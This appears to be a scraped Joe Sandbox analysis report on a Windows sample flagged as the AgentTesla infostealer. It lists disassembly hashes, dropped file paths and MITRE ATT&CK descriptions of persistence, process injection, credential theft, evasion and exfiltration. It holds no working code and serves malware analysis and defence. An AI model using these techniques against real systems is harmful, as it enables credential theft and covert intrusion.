Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: dcfd24338462a1ee37966c09ddce1af736f7ab398231c11179f3e761b85ef868
Instruction ID: 448e833e6bf04032ff59464b7df01236d7d545c72b70b367c242c272df8eb324
Opcode Fuzzy Hash: dcfd24338462a1ee37966c09ddce1af736f7ab398231c11179f3e761b85ef868
Instruction Fuzzy Hash: 84B14D30E20219CFDB54EF68C594AAEB7B2FF84304F248929D5069B359DB35DC86CB81

Function 067F88D8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 067F8963
LR^q, xrefs: 067F89CB
$^q, xrefs: 067F8957
LR^q, xrefs: 067F8A1A

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 084e46bf7dd06cfc225c1b8bb674c1b49f7344f9c2eaf8615b9829e9d9815fdd
Instruction ID: ad3e1448a9a7be828cb35e74fe9eef26a590cc3b3941f3294ba258c4478583d0
Opcode Fuzzy Hash: 084e46bf7dd06cfc225c1b8bb674c1b49f7344f9c2eaf8615b9829e9d9815fdd
Instruction Fuzzy Hash: 8451A230B102018FDB58DB28D950E7AB7F6FF88304F148969E5059B3A9EE31EC45CB92

Function 067FADA3 Relevance: 5.2, Strings: 4, Instructions: 165COMMON

Download Yara Rule

Strings

$^q, xrefs: 067FAF24
$^q, xrefs: 067FAF7C
$^q, xrefs: 067FAF53
$^q, xrefs: 067FAED1

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 307ed5969931fab18f397ca70afbe7734e8c5ac14c9a26765d76274c49e5520a
Instruction ID: c8ac0865d2131a7f962ebf431c84a152aa3ddc88b29c09a0f97e6e358b88c506
Opcode Fuzzy Hash: 307ed5969931fab18f397ca70afbe7734e8c5ac14c9a26765d76274c49e5520a
Instruction Fuzzy Hash: EE516E30A20204CFDFA5DB68D580ABEB7F2EB88310F148529D50A9B354DB31DC46CF91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iNFGd6bDZX.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iNFGd6bDZX.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newapp.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21evn0oi.nz3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mv4gxzg.rzl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3ejjsr4.cvs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmvkwl2i.opo.ps1

C:\Users\user\AppData\Roaming\newapp\newapp.exe

C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier

Static File Info

General

File Icon

Windows Analysis Report
iNFGd6bDZX.exe

Function 00C70E85 Relevance: 2.7, Strings: 2, Instructions: 171
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre